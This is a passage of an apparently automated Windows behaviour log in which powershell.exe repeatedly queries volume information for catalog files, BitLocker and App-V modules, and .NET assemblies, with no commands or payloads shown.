Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
